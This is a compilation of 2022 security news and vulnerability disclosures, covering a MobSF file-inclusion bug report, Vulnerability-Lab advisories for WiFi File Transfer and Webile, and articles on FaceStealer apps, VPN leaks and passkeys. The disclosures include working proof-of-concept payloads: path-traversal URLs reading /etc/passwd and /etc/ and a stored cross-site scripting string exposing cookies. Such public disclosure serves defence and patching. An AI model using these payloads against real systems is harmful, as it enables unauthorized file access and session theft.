Mobile Security Framework (MobSF) v0.9.2 and below was discovered to contain a local file inclusion (LFI) vulnerability in the StaticAnalyzer/views.py script. This vulnerability allows attackers to read arbitrary files via a crafted HTTP request.

Hi Ajin,

I've found a Local File Inclusion Vulnerablity in StaticAnalyzer/views.py (Version <= v0.9.2)

**Detail:** Bypass "md5" varriable by

*   An actual md5 string (e.g: an uploaded file) at the head.
*   Null-byte at the end of string

**PoC**:  
http://127.0.0.1:8000/ViewSource/  
?file=de/robv/android/xposed/installer/repo/RepoDb.java  
&md5=_36570c6fac687ffe08107e6a72bd3da7/../../../../../../../../../../../private/etc/passwd%00_  
&type=apk

**Before fixing: read /private/etc/passwd on MAC OS**  
  
**After Fixed**  

I'm still working on contributing this great project.  
Thanks for all

CVE-2022-41547: [Security] Fix Local File Inclusion Vulnerability in ViewSource Function. Version <= v0.9.2 by thongngo · Pull Request #166 · MobSF/Mobile-Security-Framework-MobSF

TP-Link AX10v1 V1_211117 allows attackers to execute a replay attack by using a previously transmitted encrypted authentication message and valid authentication token. Attackers are able to login to the web application as an admin user.

**Setup Video**

*   **How to Set up Address Reservation on TP-Link Routers Windows**
    
    This video will show you how to set up Address Reservation on TP-Link routers.
    
    More Fold
    
*   **How to Set up OpenVPN on TP-Link Routers Windows**
    
    This video will show you how to set up OpenVPN on a TP-Link Wi-Fi router. For more information, visit www.tp-link.com/support.
    
    More Fold
    
*   **How to setup PPTP VPN on TP Link routers Windows**
    
    This video will show you how to set up PPTP VPN on a TP-Link Wi-Fi router. For more information, visit www.tp-link.com/support
    
    More Fold
    
*   **How to Setup A TP-Link WiFi 6 Router**
    
    This setup guide will show you how quickly and easily you can setup your new TP-Link WiFi 6 router.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a DSL modem and a TP-Link router**
    
    If you can’t access the internet using a DSL modem and TP-Link router, this video can help you solve the problem.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a cable modem and a TP-Link router**
    
    If you can’t access the internet using a cable modem and TP-Link router, follow this video step by step to solve your problem.
    
    More Fold
    
*   **TP Link Archer AX Series Unboxing and Setup (for Archer AX10, etc.)**

**Firmware**

A firmware update can resolve issues that the previous firmware version may have and improve its current performance.

**To Upgrade**

**IMPORTANT:** To prevent upgrade failures, please read the following before proceeding with the upgrade process

*   **Please upgrade firmware from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it will be against the warranty. Please click here to change site if necessary.**
*   Please verify the hardware version of your device for the firmware version. Wrong firmware upgrade may damage your device and void the warranty. (**Normally Vx.0=Vx.6/Vx.8 (eg:V1.0=V1.6/V1.8);   Vx.x0=Vx.x6/Vx.x8 (eg:V1.20=V1.26/V1.28)**  
    How to find the hardware version on a TP-Link device
*   **Do NOT turn off the power during the upgrade process, as it may cause permanent damage to the product.**
*   To avoid wireless disconnect issue during firmware upgrade process, it's recommended to upload firmware with wired connection unless there is no LAN/Ethernet port on your TP-Link device.
*   It's recommended that users stop all Internet applications on the computer, or simply disconnect Internet line from the device before the upgrade.
*   Use decompression software such as WinZIP or WinRAR to extract the file you download before the upgrade.

More Fold

Archer AX10(US)\_V1\_220401

Download

**Important Notice**

Please upgrade firmware/software from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it may cause upgrade failure or mistakes and be against the warranty.

Still Download  Go to Local Website

Published Date: 2022-05-11

Language: Multi-language

File Size: 15.82 MB

New Features:  
1\. Added support for Agile Config feature;  
2\. Added support for TR-069 feature.

Archer AX10(US)\_V1\_211117

Download

**Important Notice**

Please upgrade firmware/software from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it may cause upgrade failure or mistakes and be against the warranty.

Still Download  Go to Local Website

Published Date: 2021-11-30

Language: English

File Size: 15.66 MB

Release Note:  
Bug Fixed:  
1\. Fixed some GDPR Encryption vulnerabilities;  
2\. Fixed abnormal DHCP lease renewal;  
3\. Fixed HTTP smuggling attack vulnerability;  
4\. Fixed HTTP/0.9 request vulnerability.

Archer AX10(US)\_V1\_211014

Download

**Important Notice**

Please upgrade firmware/software from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it may cause upgrade failure or mistakes and be against the warranty.

Still Download  Go to Local Website

Published Date: 2021-11-17

Language: Multi-language

File Size: 15.66 MB

New Features/Enhancement:  
1.Optimized VPN Server feature;  
2.Updated dropbear version and changed the dropbear port;  
3.Updated openssl version;  
4.Improved the stability of OneMesh feature;  
5.Improved the wireless stability.

Bug Fixed:  
1.Fixed the bugs on the Web UI;  
2.Fixed security vulnerabilities;  
3.Fixed the bugs related to dnsmasq;  
4.Fixed the bug that the router can't get WAN IP in some cases;  
5.Fixed the bug related to DMZ;  
6.Fixed the bugs related to AP mode;  
7.Fixed the bug that QoS can't work in some cases;  
8.Fixed the bugs on Tether App;  
9.Fixed WPA3-SAE DOS attack vulnerability;  
10.Fixed the bugs related to WPS.

**To Use Third Party Firmware In TP-Link Products**

Some official firmware of TP-Link products can be replaced by the third party firmware such as DD-WRT. TP-Link is not obligated to provide any maintenance or support for it, and does not guarantee the performance and stability of third party firmware. Damage to the product as a result of using third party firmware will void the product's warranty.

**Open Source Code For Programmers (GPL)**

Please note: The products of TP-Link partly contain software code developed by third parties, including software code subject to the GNU General Public Licence (“GPL“), Version 1/Version 2/Version 3 or GNU Lesser General Public License ("LGPL"). You may use the respective software condition to following the GPL licence terms.

You can review, print and download the respective GPL licence terms here. You receive the GPL source codes of the respective software used in TP-Link products for direct download and further information, including a list of TP-Link software that contain GPL software code under GPL Code Center.

The respective programs are distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the respective GNU General Public License for more details.

**Apps**

TP-Link Tether

TP-Link Tether provides the easiest way to access and manage your network with your iOS or Android devices. Learn more about TP-Link Tether and Compatible Devices

*   
*   

Note: To use Tether, please update your TP-Link device’s firmware to the latest version.

**Emulators**

Firmware Version

Working Mode

Language

190321(US)

\-

English

Browse

**Note:**

1\.  The emulator is a virtual web GUI where you can experience the TP-Link product management panel.

2\. The listed emulators might not have the latest firmware.

3\.  The features displayed are for reference, and their availability may depend on local regulations. For more information, please refer to the datasheet or product page.

Earlier this month, security researchers from Meta found 400 malicious Android and iOS apps designed to steal user Facebook login credentials.

Such mobile malware, which Malwarebytes detects typically as **Android/Trojan.Spy.Facestealer**, usually arrives as an app disguised as a useful or entertaining tool. But before the app can be fully used, it asks users to login to their accounts, at which point their usernames and passwords are sent to the fraudsters.

Stolen credentials can be used to compromise Facebook accounts. From there, the criminals can harvest more data about the original account owner, message friends or family members and scam them, or use these accounts to promote the FaceStealer app (among other things).

Meta listed a short description of FaceStealer apps listed on both the Google Play Store and the Apple App Store:

> *   Photo editors, including those that claim to allow you to "turn yourself into a cartoon"
> *   VPNs claiming to boost browsing speed or grant access to blocked content or websites
> *   Phone utilities such as flashlight apps that claim to brighten your phone's flashlight
> *   Mobile games falsely promising high-quality 3D graphics
> *   Health and lifestyle apps such as horoscopes and fitness trackers
> *   Business and ad management apps claiming to provide hidden or unauthorized features not found in official apps by tech platforms.

If the apps appear to have positive reviews, that's because the developers are thought to be creating five-star reviews to bury the negative ones. This is a known social engineering tactic to entice users further to try an app.

FaceStealer has been around for a while. The apps disappear after making headlines, and then FaceStealer pops up again as a different app. And while some apps are reported or actively detected, many evade detection and end up on legitimate app stores.

"The industry, in general, has not been great at detecting these, and everyone is playing catch-up," said Nathan Collier, Malwarebytes Senior Malware Intelligence Analyst for Android.

Meta said it is alerting Facebook users who may have inadvertently "self-compromised" themselves by using their Facebook credentials to use the malicious apps.

If you think you've entereed your Facebook credentials into a dodgy app, change your password immediately. Don't reuse passwords you use on other accounts, and make sure you enable two-factor authentication (2FA) on your Facebook account. You can also let Facebook alert you of attempted log-ins to your account.

Finally, report all suspicious apps using Meta's Data Abuse Bounty program.

Warning: "FaceStealer" iOS and Android apps steal your Facebook login

Main driver for the change: "Plaintext SMS messages are inherently insecure."

Private messaging app Signal plans to discontinue the ability for Android users to send and receive plaintext SMS and MMS messages with the Signal app.

The app developer cited its priority of providing security and privacy to users for the decision — as well as protecting users from surprise messaging bills from their mobile providers and providing an overall more streamlined and clear user experience.

"The most important reason for us to remove SMS support from Android is that plaintext SMS messages are inherently insecure. They leak sensitive metadata and place your data in the hands of telecommunications companies. With privacy and security at the heart of what we do, letting a deeply insecure messaging protocol have a place in the Signal interface is inconsistent with our values and with what people expect when they open Signal," the mobile messaging app provider wrote in a post late last week.

The phaseout will occur over the next few months, and Android Signal users will receive notifications on how to export SMS messages and select a default SMS messenger, as well as how to invite users to Signal who texted them via SMS. 

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Signal to Ditch SMS/MMS Messaging on Android

WiFi File Transfer version 1.0.8 suffers from a cross site scripting vulnerability.

Document Title:  
===============  
WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2322

Release Date:  
=============  
2022-10-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2322

Common Vulnerability Scoring System:  
====================================  
5.6

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required.

(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a multiple persistent cross site vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application.

Affected Product(s):  
====================  
smarterDroid  
Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2022-10-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Independent Security Research

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application  
requests from the application-side.

The vulnerabilities are located in the data_file parameter of the add a file or folder and create a zip file function.  
Attackers with wifi access are able to anonymous use the webui and can inject own malicious script code with persistent  
attack vector via post method request.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external  
redirects to malicious source and persistent manipulation of affected application modules.

Proof of Concept (PoC):  
=======================  
The persistent post inject web vulnerabilities can be exploited by remote attackers in the same wifi network with anonymous privileges and low user interaction.  
For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue.

Manual reproduce of the vulnerability ...  
1. Install the mobile android application and start it  
2. Start the wifi web-server  
3. Login as attacker by the browser over the network  
4. Inject payload as folder name, file name or zip file and save via post method request  
5. The payload executes in the web ui when previewing the paths

Exploitation: Payload  
<a onmouseover=alert(document.cookie)>picture1337.jpg</a>

--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------321836412920954805143620932676  
Content-Length: 613  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
action=mkdir&data_file=New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/  
-  
POST: HTTP/1.1 302 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/DCIM/  
Content-Length: 143  
-  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
Connection: keep-alive  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---  
http://localhost:1234/storage/emulated/0/Pictures/?  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------289297208414223233314228108045  
Content-Length: 882  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Upgrade-Insecure-Requests: 1  
action=multizip&data_file=.<a onmouseover=alert(document.cookie)>File.Zip</a>.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/Pictures/  
Content-Length: 151  
-  
http://localhost:1234/storage/emulated/0/Pictures/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

Reference(s):  
http://localhost:1234/  
http://localhost:1234/storage/  
http://localhost:1234/storage/emulated/  
http://localhost:1234/storage/emulated/0/  
http://localhost:1234/storage/emulated/0/DCIM/  
http://localhost:1234/storage/emulated/0/Pictures/

Solution - Fix & Patch:  
=======================  
The persistent web vulnerabilities can be resolved by the following steps ...  
1. Restrict the input of the folder, filename and zip files to disallow special chars for add or create process  
2. Encode and escape the content of the data_file parameter to sanitize the content  
3. Sanitize and filter the output locations of the explorer path listings to prevent further attacks

Security Risk:  
==============  
The security risk of the persistent web vulnerabilities in the mobile android wifi web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

WiFi File Transfer 1.0.8 Cross Site Scripting

Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Directory Traversal

Categories: News
Tags: a week in security

Tags:  week in security

Tags:  AI Bill of Rights

Tags:  Final Fantasy XIV

Tags:  Lock and Code S03E21

Tags:  Meta

Tags:  WhatsApp

Tags:  ransomware

Tags:  tax scam

Tags:  Chinese APT

Tags:  Android

Tags:  Chrome

Tags:  iOS

Tags:  managed detection response

Tags:  MDR

Tags:  disinformation

Tags:  FBI

Tags:  CISA

The most important and interesting computer security stories from the last week.



(Read more...)




The post A week in security (October 10 - 16) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

Privacy VPN

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 10 - 16)

Categories: News
Tags: VPN

Tags:  iOS

Tags:  Android

Tags:  tunnel

Tags:  captive portal

Tags:  leak

Tags:  anonymity

“Block connections without VPN” doesn't block all connections without a VPN and “Always on VPN” isn't always on.



(Read more...)




The post Android and iOS leak some data outside VPNs appeared first on Malwarebytes Labs.

Virtual Private Networks (VPNs) on Android and iOS are in the news. It’s been discovered that in certain circumstances, some of your traffic is leaked so it ends up outside of the safety cordon created by the VPN.

Mullvad, the discoverers of this Android “feature” say that it has the potential to cause someone to be de-anonymised (but only in rare cases as it requires a fair amount of skill on behalf of the snooper). At least one Google engineer claims that this isn’t a major concern, is intended functionality, and will continue as is for the time being.

**MUL22-03**

The Android discovery, currently named MUL22-03, is not the VPN's fault. The transmission of data outside of the VPN is something which happens quite deliberately, to all brands of VPN, and not as the result of some sort of terrible hack or exploit. Although the full audit report has not yet been released, the information available so far may be worrying for some. According to the report, Android sends “connectivity checks” (traffic that determines if a connection has been made successfully) outside of whichever VPN tunnel you happen to have in place.

Perhaps confusingly, this also occurs whether or not you have “Block connections without VPN” or even “Always on VPN” switched on, which is (supposed) to do what you’d expect given the name. It’s quite reasonable to assume a setting which says one thing will not in fact do the opposite of that thing, so what is going on here?

The leakage arises as a result of certain special edge case scenarios, in which case Android will override the various “Do not do this without a VPN” settings. This would happen, for example, with something like a captive portal. A captive portal is something you typically access when joining a network—something like a hotspot sign-in page stored on a gateway.

Why? Because VPNs run on top of whatever Internet-connected network you are on, so you have to join a network before you can establish your VPN connection. Anything that happens before you establish your VPN connection can't be protected by it.

As per Bleeping Computer, this leakage can include DNS lookups, HTTPs traffic, IP addresses and (perhaps) NTP traffic (Network Time Protocol, a protocol for synchronising net-connected clocks).

Mullvad VPN first reported this a documentation issue, and then asked for a way to “...disable connectivity checks while 'Block connections without VPN' (from now on lockdown) is enabled for a VPN app.”

Google's response, via its issue tracker was “We do not think such an option would be understandable by most users, so we don't think there is a strong case for offering this.”

According to Google, disabling connectivity checks is a non-starter for four reasons: VPNs might actually be relying on them; "split channel" traffic that doesn't ever use the VPN might be relying on them; it isn't just connectivity checks that bypass the VPN anyway; and the data revealed by the connectivity checks is available elsewhere.

The rest is a back and forth debate on the pros and cons of this stance, which is still ongoing. At this point, Google is not budging.

**iOS has entered the chat**

It seems this isn’t something only confined to Android. There are similar things happening on iOS 16, with multiple Apple services claimed to be leaking outside of the VPN tunnel including maps, health, and wallet.

> We confirm that iOS 16 does communicate with Apple services outside an active VPN tunnel. Worse, it leaks DNS requests. #Apple services that escape the VPN connection include Health, Maps, Wallet.  
> We used @ProtonVPN and #Wireshark. Details in the video:#CyberSecurity #Privacy pic.twitter.com/ReUmfa67ln
> 
> — Mysk 🇨🇦🇩🇪 (@mysk\_co) October 12, 2022

According to Mysk, the traffic being sent to Apple isn't insecure, it's just going against what users expect.

> All of the traffic that appeared in the video is either encrypted or double encrypted. The issue here is about wrong assumptions. The user assumes that when the VPN is on, ALL traffic is tunneled through the VPN. But iOS doesn't tunnel everything. Android doesn't either.

They suggest that one way forward to stop this from happening would be to treat VPN apps as browsers and “require a special approval and entitlement from Apple”.

There probably won’t be much movement on this issue until the release of the full report on MUL22-03, but for now the opinion from those involved in testing seems to be that the risk is small.

Android and iOS leak some data outside VPNs

Google wants to make your digital life—in its ecosystem, anyway—passwordless and more secure.

Google recently announced that passkey support is coming to both the Android operating system and the Google Chrome web browser—and if you're wondering exactly what that means, you're in the right place. Passkeys are essentially a replacement for passwords that are designed to be more secure. You use them instead of traditional passwords to get into your various digital accounts, whether that's Google, Twitter, Dropbox, or anything else.

You don't get an _actual_ key. Instead, some kind of unlocking mechanism—typically facial recognition or fingerprint recognition, or just a PIN code—is used to prove you are who you say you are for the purposes of logging in.

However, it's not just a case of pressing a button and switching over. Developers need to also code passkey support into their apps and websites, which is why Google made the announcement on its Android Developers Blog.

The move is part of a broader industry push toward a passwordless future—you might have noticed that Microsoft is doing something similar. Users don't have to remember passwords, and there aren't any passwords for hackers to steal.

How Passkeys Work

You'll soon be able to create passkeys on your Android devices.

Google via David Nield

As Google puts it, a passkey “identifies a particular user account on some online service.” At its center is a cryptographic private key that gets stored on the devices you use. This is then matched against a public key held by the digital services you're signing into to confirm your identity.

To make sure it's really you, you'll need to unlock your phone or computer, which on a phone usually means entering a PIN code or letting your face or fingerprint get scanned. On computers, passwords may still be used to verify your identity, but the industry is moving toward biometric authentication all the time.

You don't actually see the passkey itself or need to know what it is—you just have to be you. Your face or fingerprint replaces that long list of passwords on a Post-it note that you might have, so it's much simpler and more convenient.

These passkeys use public-key cryptography, so if they're involved in a data breach, they're useless to bad actors without your face or your fingerprint. Similarly, if your laptop or phone gets stolen, your accounts can't be accessed because you're not going to be around to provide the necessary authentication.

This isn't just a Google initiative. Organizations such as the FIDO Alliance and the W3C Web Authentication group are busy working toward a passwordless future as well, so you'll be able to use these systems across any device, whether made by Google, Apple, Microsoft, or any other hardware maker.

Setting Up and Using Passkeys

Biometric authentication can be used in place of a password.

Google via David Nield

The good news is that using passkeys is as easy as unlocking your phone—it's intended to be as straightforward as possible. You'll be able to choose to move to a passkey system for your accounts, but only when the app you're logging in to and the device you're using have been upgraded with passkey support.

Let's say Google has finished rolling out passkey support to Android, you're logging in to an app that has been updated to use passkeys, and you've said yes when prompted to make the switch from a standard password. You'll then be asked to create a passkey, which will involve you having to do the same action you do to unlock your phone—show your face, press down your fingerprint, or enter a PIN. That creates the passkey and authenticates the link between the app in question and the device in your hand. Whenever you need to log in to that app in future, you'll need to go through the same unlock process. As with passwords, how long that authentication lasts will vary: With your banking app, you'll usually have to log in every time, whereas with a social media account one login per device is often enough.

You'll also be able to log in to sites on your computer through your phone via the magic of a QR code. The site will display a QR code that you scan with your phone—once you've gone through the unlock process on your mobile device, your identity will be confirmed and you'll be logged in to the site.

Encrypted synchronization across devices will also be handled—Google Password Manager is adding support for passkeys, for example, so should you lose access to one device, you can still get at your accounts from another one or from the cloud, assuming you're able to provide the necessary authentication (and you haven't changed your fingerprints or face in the meantime).

How to Use Passkeys in Google Chrome and Android

Plus: Hackers hit the Mormon Church, Signal plans to ditch SMS for Android, and a Fat Bear election erupts in scandal.

Users of the cryptocurrency exchange Celsius are in danger. Last week, as part of its bankruptcy proceedings, the company submitted a 14,500-page document that appears to contain the full names and recent transactions of its users. Typically private, this sensitive information ties people’s real-world identities to their once-anonymous cryptocurrency transactions, making them ripe targets for scammers and other criminals—and crypto-tracing investigators.

If you’re considering upgrading to the new Pixel 7 or Pixel 7 Pro, rest assured that Google put the phone’s security hardware through the wringer to make hacking the device as costly as possible. Not only that, the tech giant plans to roll out a built-in VPN for Android later this year.

For Windows 11 users, we walked through how to take advantage of Microsoft’s automatic phishing protection features. And for students and their parents, we explained exactly what to do to protect against school surveillance technology.

Finally, a Connecticut jury decided this week that Infowars host Alex Jones must pay nearly $1 billion in damages for defaming the families of victims of the 2012 mass shooting at Sandy Hook Elementary, as well as an FBI agent who responded to the horrific scene. The historic jury award doesn’t change what “free speech” means in the United States, but it might make social media platforms rethink their disinformation strategies.

But that’s not all! Each week, we round up the news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

SpaceX says it can no longer fund Starlink satellite internet service in war-torn Ukraine, according to documents obtained by CNN. More than 20,000 Starlink terminals have been donated to the country since Russia invaded in February, and the service has been a lifeline for Ukrainian military efforts. But the $120 million it will take to fund the service through the end of the year is too much for SpaceX, and the company has reportedly asked the Pentagon to pick up the bill going forward.

The move to pull funding comes at an inauspicious time for Elon Musk, SpaceX’s outspoken CEO. The leaked letter asking the Pentagon to pay for Ukraine’s Starlink terminals and service is dated September 8. Less than a month later, on October 3, Musk got into a fight on Twitter with Ukrainian officials after suggesting the country end the war by largely agreeing to Russia’s demands. While a report said that Musk had a call with Russian president Vladimir Putin prior to his tweet about Ukraine appeasing Russia, both the billionaire and the Kremlin deny the call took place.

